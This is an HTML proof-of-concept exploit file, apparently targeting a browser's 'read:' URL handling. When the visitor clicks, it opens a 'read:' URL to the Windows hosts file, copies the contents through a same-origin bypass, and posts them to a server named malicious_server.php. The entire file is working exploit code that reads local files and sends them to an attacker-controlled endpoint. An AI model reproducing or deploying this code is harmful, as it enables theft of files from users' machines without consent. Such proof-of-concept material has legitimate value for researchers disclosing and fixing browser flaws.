exploit.html

<!doctype html>
<html>
<head><meta charset="UTF-8"></head>
<body>
<form id="xss_form" method="post" action="http://127.0.0.1/malicious_server.php">
	<input id="xss" type="hidden" name="xss" value="">
</form>
Click anywhere to submit your hosts file
<script>
	document.onclick = function(event) {
		event.preventDefault();

		// append a random value to prevent caching
		var url = "read:,C:\\windows\\system32\\drivers\\etc\\hosts,"+Math.floor(Math.random() * 1000);
		var w = window.open(url);
		if (w) {

			// Copy window contents, close and submit 
			// This is allowed because we are the same origin, since we are using subsequent read:, requests
			document.getElementById("xss").value = w.document.body.innerHTML;
			w.close();
			document.getElementById("xss_form").submit();
		}
		else
			document.body.innerHTML = "Popups are blocked :<";
	}
</script>
</body>
</html>